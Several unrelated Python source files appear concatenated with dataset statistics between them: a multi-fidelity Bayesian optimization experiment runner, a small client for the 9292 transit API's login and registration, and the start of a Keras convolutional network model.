            logger.flush()
            # Checkpoint after every step so partial results survive a crash.
            with open(pickle_name, 'wb') as handle:
                pickle.dump(res, handle, protocol=pickle.HIGHEST_PROTOCOL)
def experiment_batch_hmc(dataset, method_config, mf_nn_surrogate_config, hmc_sampler_config, horizon, res_path, trial_id):
    """Run one batch-acquisition HMC trial ('ratio' or 'linear' batch mode).

    Each step refits a full auto-regressive surrogate with HMC, acquires a
    batch of (fidelity, input) pairs, queries them all, and checkpoints the
    history to trial<trial_id>.pickle.

    Args:
        dataset: multi-fidelity dataset (project type) with add_pool_interpret().
        method_config: supplies constraint, batch_mode, batch_size and (for
            'linear' mode) beta.
        mf_nn_surrogate_config: surrogate depth/width/activation/placement.
        hmc_sampler_config: HMC step_size, L, burn and Ns settings.
        horizon: number of optimization steps to run.
        res_path: output directory for the pickle and log files.
        trial_id: trial index used in the output file names.

    Raises:
        ValueError: if method_config.batch_mode is not 'ratio' or 'linear'.
    """
    layers = misc.full_auto_regressive_layers(
        dataset.in_dim, dataset.out_dim,
        mf_nn_surrogate_config.hidden_depths,
        mf_nn_surrogate_config.hidden_widths,
    )
    sampling = {
        'step_size':hmc_sampler_config.step_size,
        'L':hmc_sampler_config.L,
        'burn':hmc_sampler_config.burn,
        'Ns':hmc_sampler_config.Ns
    }
    # One history list per tracked quantity; per-query lists appended only on success.
    res = {key: [] for key in (
        'hist_argm', 'hist_argx', 'hist_yq', 'hist_y_ground', 'hist_config',
        'hist_t_fit', 'hist_t_acq', 'hist_t_query_m', 'hist_t_query_h')}
    pickle_name = os.path.join(res_path, 'trial'+str(trial_id)+'.pickle')
    log_file_name = os.path.join(res_path, 'logs_trial'+str(trial_id)+'.txt')
    # 'with' guarantees the log file is closed even when a step raises.
    with open(log_file_name, 'w+') as logger:
        logger.write('===============================================\n')
        logger.write('          Experiment with Ratio Batch          \n')
        logger.write('===============================================\n')
        logger.write('Experiment start at: '+datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
        logger.flush()
        exp_t_start = time()
        for t in trange(horizon, desc='experiment', leave=True):
            t_trial_start = time()
            model = Model.FullAutoRegressive(layers, mf_nn_surrogate_config.activation,
                    torch.device(mf_nn_surrogate_config.surrogate_placement))
            hamil_opt = BayesOpt.HamilBayesOpt(model, dataset, sampling)
            hmc_samples = hamil_opt.fit(constraint=method_config.constraint)
            t_fit = time()
            if method_config.batch_mode == 'ratio':
                pool_argm, pool_argx, _ = hamil_opt.ratio_batch_step(hmc_samples, method_config.batch_size)
            elif method_config.batch_mode == 'linear':
                pool_argm, pool_argx, _ = hamil_opt.linear_batch_step(hmc_samples, method_config.batch_size, method_config.beta)
            else:
                # Fail fast with a clear message instead of a NameError on
                # pool_argm further down.
                raise ValueError('invalid batch_mode: '+str(method_config.batch_mode))
            #
            t_acq = time()
            np_pool_argx = [argx.data.cpu().numpy() for argx in pool_argx]
            np_pool_argm = [argm.data.cpu().numpy() for argm in pool_argm]
            pool_yq, pool_y_ground, pool_success, pool_config, t_query_m_pool, t_query_h_pool =\
                dataset.add_pool_interpret(np_pool_argx, np_pool_argm, scaled_input=True)
            t_query = time()
            logger.write('* Optimization step'+str(t+1)+' finished at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
            # fit/acq timings are shared by the whole batch.
            res['hist_t_fit'].append(t_fit-t_trial_start)
            res['hist_t_acq'].append(t_acq-t_fit)
            for i in range(len(pool_success)):
                if pool_success[i]:
                    res['hist_argm'].append(np_pool_argm[i])
                    res['hist_argx'].append(np_pool_argx[i])
                    res['hist_yq'].append(pool_yq[i])
                    res['hist_y_ground'].append(pool_y_ground[i])
                    res['hist_config'].append(pool_config[i])
                    res['hist_t_query_m'].append(t_query_m_pool[i])
                    res['hist_t_query_h'].append(t_query_h_pool[i])
                    logger.write('  - Success add argm = '+np.array2string(np.array(np_pool_argm[i]))+'\n')
                    logger.write('  - Success add argx = '+np.array2string(np.array(np_pool_argx[i]))+'\n')
                    logger.write('    * t_query_m = '+str(t_query_m_pool[i])+' secs\n')
                    logger.write('    * t_query_h = '+str(t_query_h_pool[i])+' secs\n')
                else:
                    logger.write('  - Failed add argm = '+np.array2string(np.array(np_pool_argm[i]))+'\n')
                    logger.write('  - Failed add argx = '+np.array2string(np.array(np_pool_argx[i]))+'\n')
                #
            #
            logger.write('  - t_fit_surrogate = '+str(t_fit-t_trial_start)+' secs\n')
            logger.write('  - t_acq = '+str(t_acq-t_fit)+' secs\n')
            logger.write('  - t_query = '+str(t_query-t_acq)+' secs\n')
            logger.write('  - total_elapsed = '+str(t_query-exp_t_start)+' secs\n')
            logger.flush()
            # Checkpoint after every step so partial results survive a crash.
            with open(pickle_name, 'wb') as handle:
                pickle.dump(res, handle, protocol=pickle.HIGHEST_PROTOCOL)
def experiment_ao_hmc(dataset, method_config, mf_nn_surrogate_config, hmc_sampler_config, horizon, res_path, trial_id):
    """Run one alternating-optimization (AO) batch HMC trial.

    Each step refits a full auto-regressive surrogate with HMC, acquires a
    batch via ao_ratio_batch_step (5 alternations), queries it, and
    checkpoints the history to trial<trial_id>.pickle.

    Args:
        dataset: multi-fidelity dataset (project type) with add_pool_interpret().
        method_config: supplies constraint and batch_size.
        mf_nn_surrogate_config: surrogate depth/width/activation/placement.
        hmc_sampler_config: HMC step_size, L, burn and Ns settings.
        horizon: number of optimization steps to run.
        res_path: output directory for the pickle and log files.
        trial_id: trial index used in the output file names.
    """
    layers = misc.full_auto_regressive_layers(
        dataset.in_dim, dataset.out_dim,
        mf_nn_surrogate_config.hidden_depths,
        mf_nn_surrogate_config.hidden_widths,
    )
    sampling = {
        'step_size':hmc_sampler_config.step_size,
        'L':hmc_sampler_config.L,
        'burn':hmc_sampler_config.burn,
        'Ns':hmc_sampler_config.Ns
    }
    # One history list per tracked quantity; per-query lists appended only on success.
    res = {key: [] for key in (
        'hist_argm', 'hist_argx', 'hist_yq', 'hist_y_ground', 'hist_config',
        'hist_t_fit', 'hist_t_acq', 'hist_t_query_m', 'hist_t_query_h')}
    pickle_name = os.path.join(res_path, 'trial'+str(trial_id)+'.pickle')
    log_file_name = os.path.join(res_path, 'logs_trial'+str(trial_id)+'.txt')
    # 'with' guarantees the log file is closed even when a step raises.
    with open(log_file_name, 'w+') as logger:
        logger.write('===============================================\n')
        logger.write('           Experiment with AO Batch            \n')
        logger.write('===============================================\n')
        logger.write('Experiment start at: '+datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
        logger.flush()
        exp_t_start = time()
        for t in trange(horizon, desc='experiment', leave=True):
            t_trial_start = time()
            model = Model.FullAutoRegressive(layers, mf_nn_surrogate_config.activation,
                    torch.device(mf_nn_surrogate_config.surrogate_placement))
            hamil_opt = BayesOpt.HamilBayesOpt(model, dataset, sampling)
            hmc_samples = hamil_opt.fit(constraint=method_config.constraint)
            t_fit = time()
            pool_argm, pool_argx, _ = hamil_opt.ao_ratio_batch_step(hmc_samples, method_config.batch_size, alters=5)
            t_acq = time()
            np_pool_argx = [argx.data.cpu().numpy() for argx in pool_argx]
            np_pool_argm = [argm.data.cpu().numpy() for argm in pool_argm]
            pool_yq, pool_y_ground, pool_success, pool_config, t_query_m_pool, t_query_h_pool =\
                dataset.add_pool_interpret(np_pool_argx, np_pool_argm, scaled_input=True)
            t_query = time()
            logger.write('* Optimization step'+str(t+1)+' finished at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
            # fit/acq timings are shared by the whole batch.
            res['hist_t_fit'].append(t_fit-t_trial_start)
            res['hist_t_acq'].append(t_acq-t_fit)
            for i in range(len(pool_success)):
                if pool_success[i]:
                    res['hist_argm'].append(np_pool_argm[i])
                    res['hist_argx'].append(np_pool_argx[i])
                    res['hist_yq'].append(pool_yq[i])
                    res['hist_y_ground'].append(pool_y_ground[i])
                    res['hist_config'].append(pool_config[i])
                    res['hist_t_query_m'].append(t_query_m_pool[i])
                    res['hist_t_query_h'].append(t_query_h_pool[i])
                    logger.write('  - Success add argm = '+np.array2string(np.array(np_pool_argm[i]))+'\n')
                    logger.write('  - Success add argx = '+np.array2string(np.array(np_pool_argx[i]))+'\n')
                    logger.write('    * t_query_m = '+str(t_query_m_pool[i])+' secs\n')
                    logger.write('    * t_query_h = '+str(t_query_h_pool[i])+' secs\n')
                else:
                    logger.write('  - Failed add argm = '+np.array2string(np.array(np_pool_argm[i]))+'\n')
                    logger.write('  - Failed add argx = '+np.array2string(np.array(np_pool_argx[i]))+'\n')
                #
            #
            logger.write('  - t_fit_surrogate = '+str(t_fit-t_trial_start)+' secs\n')
            logger.write('  - t_acq = '+str(t_acq-t_fit)+' secs\n')
            logger.write('  - t_query = '+str(t_query-t_acq)+' secs\n')
            logger.write('  - total_elapsed = '+str(t_query-exp_t_start)+' secs\n')
            logger.flush()
            # Checkpoint after every step so partial results survive a crash.
            with open(pickle_name, 'wb') as handle:
                pickle.dump(res, handle, protocol=pickle.HIGHEST_PROTOCOL)
def experiment_mf_mes(domain_name, horizon, num_trials, num_inits, init_i_trial, penalty):
    """Run the MF-MES baseline through its own runner script.

    Builds comma-separated CLI options and invokes customized_bo_runner.py
    inside baselines/MF-MES/experiments as a subprocess.

    Args:
        domain_name: benchmark domain passed via -d.
        horizon: number of BO steps (-t).
        num_trials: number of trials (-T).
        num_inits: per-fidelity initial sample counts, joined into -i.
        init_i_trial: first trial index (-f).
        penalty: per-fidelity query costs, joined into -s.
    """
    Ninit = ",".join(str(e) for e in num_inits)
    costs = ",".join(str(e) for e in penalty)
    # cwd= runs the child in the baseline's directory without mutating this
    # process's working directory (os.chdir would leave it wrong on failure).
    subprocess.run(["python", "customized_bo_runner.py", "-m", "MFMES_RFM", "-d", domain_name, "-t", str(horizon),
                    "-c", "2000000", "-i", Ninit, "-s", costs, "-T", str(num_trials), "-f", str(init_i_trial)],
                   cwd='baselines/MF-MES/experiments')
def experiment_par_mf_mes(domain_name, horizon, num_trials, num_inits, init_i_trial, penalty):
    """Run the parallel MF-MES baseline through its own runner script.

    Builds comma-separated CLI options and invokes
    customized_parallel_bayesopt_exp.py inside baselines/MF-MES/experiments.

    Args:
        domain_name: benchmark domain passed via -d.
        horizon: number of BO steps (-t).
        num_trials: number of trials (-T).
        num_inits: per-fidelity initial sample counts, joined into -i.
        init_i_trial: first trial index (-f).
        penalty: per-fidelity query costs, joined into -s.
    """
    Ninit = ",".join(str(e) for e in num_inits)
    costs = ",".join(str(e) for e in penalty)
    # cwd= runs the child in the baseline's directory without mutating this
    # process's working directory (os.chdir would leave it wrong on failure).
    subprocess.run(["python", "customized_parallel_bayesopt_exp.py", "-m", "Parallel_MFMES_RFM", "-d", domain_name, "-t", str(horizon),
                    "-c", "2000000", "-i", Ninit, "-s", costs, "-T", str(num_trials), "-f", str(init_i_trial)],
                   cwd='baselines/MF-MES/experiments')
def experiment_mf_gp_ucb(domain_name, horizon, num_trials, num_inits, init_i_trial, penalty):
    """Run the MF-GP-UCB (BOCA) baseline through the MF-MES runner script.

    Builds comma-separated CLI options and invokes customized_bo_runner.py
    inside baselines/MF-MES/experiments. Note: the "-f" flag is passed
    exactly once (it used to be duplicated).

    Args:
        domain_name: benchmark domain passed via -d.
        horizon: number of BO steps (-t).
        num_trials: number of trials (-T).
        num_inits: per-fidelity initial sample counts, joined into -i.
        init_i_trial: first trial index (-f).
        penalty: per-fidelity query costs, joined into -s.
    """
    Ninit = ",".join(str(e) for e in num_inits)
    costs = ",".join(str(e) for e in penalty)
    # cwd= runs the child in the baseline's directory without mutating this
    # process's working directory (os.chdir would leave it wrong on failure).
    subprocess.run(["python", "customized_bo_runner.py", "-m", "BOCA", "-d", domain_name, "-t", str(horizon),
                    "-c", "2000000", "-i", Ninit, "-s", costs, "-T", str(num_trials), "-f", str(init_i_trial)],
                   cwd='baselines/MF-MES/experiments')
def experiment_smac(domain_name, horizon, num_trials, init_i_trial, penalty, placement):
    """Run the SMAC baseline for num_trials independent trials.

    Results for trial t+init_i_trial go to results/<domain>/smac/trial<id>.
    penalty[-1] is handed to the client — presumably the highest-fidelity
    query cost; TODO confirm against SMAC3.Client.
    """
    for t in range(num_trials):
        trial = t + init_i_trial
        res_path = os.path.join('results', domain_name, 'smac', 'trial'+str(trial))
        try:
            # exist_ok=True makes a separate pre-existence check unnecessary.
            os.makedirs(res_path, exist_ok=True)
            print("Directory '%s' created successfully" % (res_path))
        except OSError:
            print("Directory '%s' can not be created" % (res_path))
        #
        client = SMAC3.Client(domain_name, penalty[-1], horizon, res_path, torch.device(placement))
        client.minimize()
def experiment_gp_kernel(domain_name, horizon, num_trials, init_i_trial, penalty, placement):
    """Run the GP-kernel baseline for num_trials independent trials.

    Results for trial t+init_i_trial go to results/<domain>/gp_kernel/trial<id>.
    penalty[-1] is handed to the client — presumably the highest-fidelity
    query cost; TODO confirm against SMAC4.Client.
    """
    for t in range(num_trials):
        trial = t + init_i_trial
        res_path = os.path.join('results', domain_name, 'gp_kernel', 'trial'+str(trial))
        try:
            # exist_ok=True makes a separate pre-existence check unnecessary.
            os.makedirs(res_path, exist_ok=True)
            print("Directory '%s' created successfully" % (res_path))
        except OSError:
            print("Directory '%s' can not be created" % (res_path))
        #
        client = SMAC4.Client(domain_name, penalty[-1], horizon, res_path, torch.device(placement))
        client.minimize()
def experiment_hyperband(domain_name, horizon, num_trials, init_i_trial, penalty, placement):
    """Run the Hyperband baseline for num_trials independent trials.

    Results for trial t+init_i_trial go to results/<domain>/hyperband/trial<id>.
    penalty[-1] is handed to the client — presumably the highest-fidelity
    query cost; TODO confirm against Hyperband.Client.
    """
    for t in range(num_trials):
        trial = t + init_i_trial
        res_path = os.path.join('results', domain_name, 'hyperband', 'trial'+str(trial))
        try:
            # exist_ok=True makes a separate pre-existence check unnecessary.
            os.makedirs(res_path, exist_ok=True)
            print("Directory '%s' created successfully" % (res_path))
        except OSError:
            print("Directory '%s' can not be created" % (res_path))
        #
        client = Hyperband.Client(domain_name, penalty[-1], horizon, res_path, torch.device(placement))
        client.minimize()
def experiment_bohb(domain_name, horizon, num_trials, init_i_trial, penalty, placement):
    """Run the BOHB baseline for num_trials independent trials.

    Results for trial t+init_i_trial go to results/<domain>/bohb/trial<id>.
    penalty[-1] is handed to the client — presumably the highest-fidelity
    query cost; TODO confirm against BOHB.Client.
    """
    for t in range(num_trials):
        trial = t + init_i_trial
        res_path = os.path.join('results', domain_name, 'bohb', 'trial'+str(trial))
        try:
            # exist_ok=True makes a separate pre-existence check unnecessary.
            os.makedirs(res_path, exist_ok=True)
            print("Directory '%s' created successfully" % (res_path))
        except OSError:
            print("Directory '%s' can not be created" % (res_path))
        #
        client = BOHB.Client(domain_name, penalty[-1], horizon, res_path, torch.device(placement))
        client.minimize()
def experiment_multitask_bo(dataset, method_config, horizon, res_path, trial_id):
    """Run one multitask-BO trial using the SHPO surrogate.

    Each step rebuilds the HPO surrogate, takes one acquisition step under
    the dataset's penalty, queries the dataset (unscaled input), and
    checkpoints the history to trial<trial_id>.pickle.

    Args:
        dataset: multi-fidelity dataset (project type) exposing add_interpret().
        method_config: supplies base_dim, base_hidden_depth,
            base_hidden_width and surrogate_placement.
        horizon: number of optimization steps to run.
        res_path: output directory for the pickle and log files.
        trial_id: trial index used in the output file names.
    """
    # One history list per tracked quantity; appended only on a successful query.
    res = {key: [] for key in (
        'hist_argm', 'hist_argx', 'hist_yq', 'hist_y_ground', 'hist_config',
        'hist_t_fit', 'hist_t_acq', 'hist_t_query_m', 'hist_t_query_h')}
    pickle_name = os.path.join(res_path, 'trial'+str(trial_id)+'.pickle')
    log_file_name = os.path.join(res_path, 'logs_trial'+str(trial_id)+'.txt')
    base_dim = method_config.base_dim
    base_hidden_depth = method_config.base_hidden_depth
    base_hidden_width = method_config.base_hidden_width
    surrogate_device = torch.device(method_config.surrogate_placement)
    # 'with' guarantees the log file is closed even when a step raises.
    with open(log_file_name, 'w+') as logger:
        logger.write('===============================================\n')
        logger.write('         Experiment with Multitask BO          \n')
        logger.write('===============================================\n')
        logger.write('Experiment start at: '+datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
        logger.flush()
        exp_t_start = time()
        for t in trange(horizon, desc='experiment', leave=True):
            t_trial_start = time()
            hpo = SHPO.HPO(dataset, base_dim, base_hidden_depth, base_hidden_width, surrogate_device)
            t_fit = time()
            np_argm, np_argx = hpo.step(dataset.penalty)
            t_acq = time()
            yq, y_ground, success, config, t_query_m, t_query_h = dataset.add_interpret(np_argx, np_argm, scaled_input=False)
            t_query = time()
            if success:
                res['hist_argm'].append(np_argm)
                res['hist_argx'].append(np_argx)
                res['hist_yq'].append(yq)
                res['hist_y_ground'].append(y_ground)
                res['hist_config'].append(config)
                res['hist_t_fit'].append(t_fit-t_trial_start)
                res['hist_t_acq'].append(t_acq-t_fit)
                res['hist_t_query_m'].append(t_query_m)
                res['hist_t_query_h'].append(t_query_h)
                logger.write('* Optimization step'+str(t+1)+' finished at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
                logger.write('  - argm = '+str(np_argm)+'\n')
                logger.write('  - argx = '+np.array2string(np_argx)+'\n')
                logger.write('  - t_fit_surrogate = '+str(t_fit-t_trial_start)+' secs\n')
                logger.write('  - t_acq = '+str(t_acq-t_fit)+' secs\n')
                logger.write('  - t_query_m = '+str(t_query_m)+' secs\n')
                logger.write('  - t_query_h = '+str(t_query_h)+' secs\n')
                logger.write('  - t_query = '+str(t_query-t_acq)+' secs\n')
                logger.write('  - total_elapsed = '+str(t_query-exp_t_start)+' secs\n')
                logger.flush()
            else:
                logger.write('* Optimization step'+str(t+1)+' FAILED at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
                logger.write('  - argm = '+str(np_argm)+'\n')
                logger.write('  - argx = '+np.array2string(np_argx)+'\n')
                logger.flush()
            # Checkpoint after every step so partial results survive a crash.
            with open(pickle_name, 'wb') as handle:
                pickle.dump(res, handle, protocol=pickle.HIGHEST_PROTOCOL)
def experiment_gp_ts(domain_name):
    """Run the GP parallel Thompson-sampling baseline.

    Invokes the per-domain runner script run_gpts_<domain_name>.py inside
    baselines/gp-parallel-ts as a subprocess.
    """
    runner_name = 'run_gpts_'+domain_name+'.py'
    # cwd= runs the child in the baseline's directory without mutating this
    # process's working directory (os.chdir would leave it wrong on failure).
    subprocess.run(["python", runner_name], cwd='baselines/gp-parallel-ts')
def evaluation(**kwargs):
    """CLI entry point: parse kwargs into configs and dispatch the experiment.

    The algorithm is selected by opt_config.algorithm_name. The HMC-surrogate
    methods all share the same per-trial loop (fresh dataset per trial,
    results under results/<domain>/<algorithm>/trial<id>), so that loop is
    factored into a local helper. Baselines delegate to their experiment_*
    runners with the arguments they need.
    """
    configs = parse_exp_configs(kwargs)
    opt_config = configs['opt_config']
    algo = opt_config.algorithm_name
    domain_name = configs['domain_config'].domain_name
    domain_penalty = configs['domain_config'].penalty
    domain_placement = configs['domain_config'].domain_placement
    domain_Ninits = configs['domain_config'].num_inits
    preload = os.path.join('data','preload',domain_name+'.pickle')
    mf_func = functions.MfFunc(domain_name, domain_penalty, torch.device(domain_placement))
    #
    def _run_hmc_trials(experiment_fn):
        # Shared trial loop for every HMC-surrogate-based method: a fresh
        # dataset per trial, one results directory per trial id.
        init_i_trial = opt_config.init_i_trial
        for t in range(opt_config.num_trials):
            dataset = Dataset.MfData(mf_func, preload)
            tid = t + init_i_trial
            res_path = os.path.join('results', domain_name, algo, 'trial'+str(tid))
            create_path(res_path)
            experiment_fn(
                dataset,
                configs['method_config'],
                configs['mf_nn_surrogate_config'],
                configs['hmc_config'],
                opt_config.horizon,
                res_path,
                tid,
            )
        #
    #
    if algo in MF_DNN_APPROACH:
        _run_hmc_trials(experiment_mf_dnn)
    elif algo in SINGLE_BASED_APPROACH:
        _run_hmc_trials(experiment_single_hmc)
    elif algo in RANDOM_APPROACH:
        _run_hmc_trials(experiment_random)
    elif algo in PAR_HMC_BASED_APPROACH:
        _run_hmc_trials(experiment_par_hmc)
    elif algo in BATCH_HMC_BASED_APPROACH:
        _run_hmc_trials(experiment_batch_hmc)
    elif algo in AO_HMC_BASED_APPROACH:
        _run_hmc_trials(experiment_ao_hmc)
    elif algo == 'mf_gp_ucb':
        experiment_mf_gp_ucb(
            domain_name,
            opt_config.horizon,
            opt_config.num_trials,
            domain_Ninits,
            opt_config.init_i_trial,
            domain_penalty
        )
    elif algo == 'mf_mes':
        experiment_mf_mes(
            domain_name,
            opt_config.horizon,
            opt_config.num_trials,
            domain_Ninits,
            opt_config.init_i_trial,
            domain_penalty
        )
    elif algo == 'par_mf_mes':
        experiment_par_mf_mes(
            domain_name,
            opt_config.horizon,
            opt_config.num_trials,
            domain_Ninits,
            opt_config.init_i_trial,
            domain_penalty
        )
    elif algo == 'smac':
        experiment_smac(
            domain_name,
            opt_config.horizon,
            opt_config.num_trials,
            opt_config.init_i_trial,
            domain_penalty,
            domain_placement
        )
    elif algo == 'gp_kernel':
        experiment_gp_kernel(
            domain_name,
            opt_config.horizon,
            opt_config.num_trials,
            opt_config.init_i_trial,
            domain_penalty,
            domain_placement
        )
    elif algo == 'hyperband':
        experiment_hyperband(
            domain_name,
            opt_config.horizon,
            opt_config.num_trials,
            opt_config.init_i_trial,
            domain_penalty,
            domain_placement
        )
    elif algo == 'bohb':
        experiment_bohb(
            domain_name,
            opt_config.horizon,
            opt_config.num_trials,
            opt_config.init_i_trial,
            domain_penalty,
            domain_placement
        )
    elif algo in MT_APPROACH:
        # Multitask BO takes a shorter argument list than the HMC runners.
        init_i_trial = opt_config.init_i_trial
        for t in range(opt_config.num_trials):
            dataset = Dataset.MfData(mf_func, preload)
            tid = t + init_i_trial
            res_path = os.path.join('results', domain_name, algo, 'trial'+str(tid))
            create_path(res_path)
            experiment_multitask_bo(
                dataset,
                configs['method_config'],
                opt_config.horizon,
                res_path,
                tid,
            )
        #
    elif algo == 'gp_ts':
        experiment_gp_ts(
            domain_name
        )
# CLI entry point: python-fire turns `evaluation`'s parameters into
# command-line flags (e.g. --domain_name=...).
if __name__=='__main__':
    fire.Fire(evaluation)
| 39.689655
| 139
| 0.584564
| 6,101
| 48,342
| 4.295853
| 0.043763
| 0.033653
| 0.038918
| 0.044946
| 0.888779
| 0.868442
| 0.854554
| 0.851311
| 0.846198
| 0.837651
| 0
| 0.002179
| 0.269
| 48,342
| 1,218
| 140
| 39.689655
| 0.739487
| 0.051963
| 0
| 0.780854
| 0
| 0
| 0.164122
| 0.023034
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020761
| false
| 0
| 0.019608
| 0
| 0.041522
| 0.011534
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
03e9e7917f807ecb943ed9570e4ec3d29a833ac0
| 1,528
|
py
|
Python
|
negentweeapi/accounts.py
|
PythonWrappers/9292API
|
50034c9ebc0bf51d8b06bb9d44267c7c602418f1
|
[
"Apache-2.0"
] | null | null | null |
negentweeapi/accounts.py
|
PythonWrappers/9292API
|
50034c9ebc0bf51d8b06bb9d44267c7c602418f1
|
[
"Apache-2.0"
] | null | null | null |
negentweeapi/accounts.py
|
PythonWrappers/9292API
|
50034c9ebc0bf51d8b06bb9d44267c7c602418f1
|
[
"Apache-2.0"
] | null | null | null |
from .settings import *
import requests
import json
def login(username: str, password: str) -> dict:
    """
    Tries to login to the 9292 API. Some functions that are available need a
    sessionID, because they are user specific; a successful login returns one.
    :param username: A string that contains the email account of a specific user
    :param password: A string that contains the password of the given email account
    :return: An dict which can contain two different keys:
            { 'error' : 'An error' },
            { 'sessionID' : 'An sessionID'}
    """
    url = "{0}/{1}/accounts/login?lang={2}".format(URL, APIVERSION, LANG)
    credentials = {
        "email": username,
        "password": password
    }
    # `json=` serializes the body exactly like json.dumps() did, and also sets
    # the 'Content-Type: application/json' header, which the previous
    # data=json.dumps(...) call omitted.
    return requests.post(url=url, json=credentials).json()
def register(username: str, password: str) -> dict:
    """
    Tries to create a 9292 account through the API. Some functions that are
    available need a sessionID, because they are user specific.
    :param username: A string that contains the email account of a specific user
    :param password: A string that contains the password of the given email account
    :return: An dict which can contain two different keys:
            { 'error' : 'An error' },
            { 'sessionID' : 'An sessionID'}
    """
    url = "{0}/{1}/accounts/register?lang={2}".format(URL, APIVERSION, LANG)
    credentials = {
        "email": username,
        "password": password
    }
    # `json=` serializes the body exactly like json.dumps() did, and also sets
    # the 'Content-Type: application/json' header, which the previous
    # data=json.dumps(...) call omitted.
    return requests.post(url=url, json=credentials).json()
| 38.2
| 118
| 0.636126
| 199
| 1,528
| 4.884422
| 0.301508
| 0.028807
| 0.045267
| 0.078189
| 0.880658
| 0.880658
| 0.880658
| 0.812757
| 0.812757
| 0.812757
| 0
| 0.012346
| 0.257853
| 1,528
| 39
| 119
| 39.179487
| 0.844797
| 0.539921
| 0
| 0.470588
| 0
| 0
| 0.152685
| 0.10906
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0.235294
| 0.176471
| 0
| 0.411765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2081bf4c3e2e22742564fd322a90e5c7cbf4a178
| 17,095
|
py
|
Python
|
ku/applications_ext/nobody_convnet2d.py
|
tonandr/keras_unsupervised
|
fd2a2494bca2eb745027178e220b42b5e5882f94
|
[
"BSD-3-Clause"
] | 4
|
2019-07-28T11:56:01.000Z
|
2021-11-06T02:50:58.000Z
|
ku/applications_ext/nobody_convnet2d.py
|
tonandr/keras_unsupervised
|
fd2a2494bca2eb745027178e220b42b5e5882f94
|
[
"BSD-3-Clause"
] | 2
|
2021-06-30T01:00:07.000Z
|
2021-07-21T08:04:40.000Z
|
ku/applications_ext/nobody_convnet2d.py
|
tonandr/keras_unsupervised
|
fd2a2494bca2eb745027178e220b42b5e5882f94
|
[
"BSD-3-Clause"
] | null | null | null |
'''
Created on Sep 15, 2020
@author: Inwoo Chung (gutomitai@gmail.com)
'''
import numpy as np
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import DepthwiseConv2D, SeparableConv2D, BatchNormalization, GlobalAveragePooling2D
from tensorflow.keras.layers import Activation, Reshape, Add, Multiply, Dropout, UpSampling2D
from tensorflow.keras import initializers
from tensorflow.keras import regularizers
# Constants.
DEBUG = True
class NobodyConvNet2D(Model):
    """2D convolution network model: strided stem, four block sequences,
    and a final 3x3 projection to `sp_feature_dim` channels."""

    def __init__(self, conf, input_shape):
        """
        Parameters
        ----------
        conf: Dictionary
            Configuration dictionary (uses raw_data_path, hps, nn_arch,
            model_loading).
        input_shape: tuple
            Input tensor shape; only the channel count (input_shape[-1])
            is used to size the stem.
        """
        # Keras Model subclasses must call super().__init__() BEFORE any
        # attribute assignment; assigning first raises RuntimeError in TF2.
        super(NobodyConvNet2D, self).__init__()

        # Initialize.
        self.conf = conf
        self.raw_data_path = self.conf['raw_data_path']
        self.hps = self.conf['hps']
        self.nn_arch = self.conf['nn_arch']
        self.model_loading = self.conf['model_loading']
        self.cell_sizes = [int(self.nn_arch['cell_size'] * 2 ** i)
                           for i in range(self.nn_arch['anchor_scale_size'])]
        self.cell_image_sizes = [int(self.nn_arch['image_size'] / self.cell_sizes[i])
                                 for i in range(self.nn_arch['anchor_scale_size'])]

        # Design layers.
        # Start stem: strided separable conv quadrupling the channel count.
        nc = int(input_shape[-1] * 4)
        rate = (1, 1)
        self.sep_conv2d_1 = SeparableConv2D(
            nc,
            kernel_size=3,
            strides=2,
            depth_multiplier=1,
            dilation_rate=(rate[0] * self.nn_arch['conv_rate_multiplier'],
                           rate[1] * self.nn_arch['conv_rate_multiplier']),
            padding='same',
            use_bias=False,
            kernel_initializer=initializers.TruncatedNormal())
        self.bn_1 = BatchNormalization(momentum=self.hps['bn_momentum'],
                                       scale=self.hps['bn_scale'])
        self.act_1 = Activation('relu')

        # Sequence1: down-sampling block, then channels double.
        self.block1_seq1 = Block1(conf, rate, nc)
        nc = int(nc * 2)

        # Sequence2.
        self.block2_seq2 = Block2(conf, rate, nc)

        # Sequence3 (its Block1 down-sampling step is disabled).
        self.block2_seq3 = Block2(conf, rate, nc)

        # Sequence4 (its Block1 down-sampling step is disabled).
        self.block2_seq4 = Block2(conf, rate, nc)

        # Sequence5 (built so the weights exist, but skipped in call()).
        self.block1_seq5 = Block1(conf, rate, nc)
        nc = int(nc * 2)
        self.block2_seq5 = Block2(conf, rate, nc)
        self.block2_seq5_2 = Block2(conf, rate, nc)

        # Sequence6 (built so the weights exist, but skipped in call()).
        self.block1_seq6 = Block1(conf, rate, nc)
        nc = int(nc * 2)
        self.block2_seq6 = Block2(conf, rate, nc)
        self.block2_seq6_2 = Block2(conf, rate, nc)

        # Final stem 1.
        self.module5 = Module5(conf, self.nn_arch['sp_feature_dim'])

    def call(self, input_tensor):
        """Forward pass: stem -> seq1..seq4 -> final projection."""
        x = self.sep_conv2d_1(input_tensor)
        x = self.bn_1(x)
        x = self.act_1(x)
        x = self.block1_seq1(x)
        x = self.block2_seq2(x)
        x = self.block2_seq3(x)
        x = self.block2_seq4(x)
        # Sequences 5 and 6 are intentionally disabled here even though
        # their layers are created in __init__.
        output = self.module5(x)
        return output
class Block1(Model):
    """Down-sampling block: Module1 halves resolution / doubles channels,
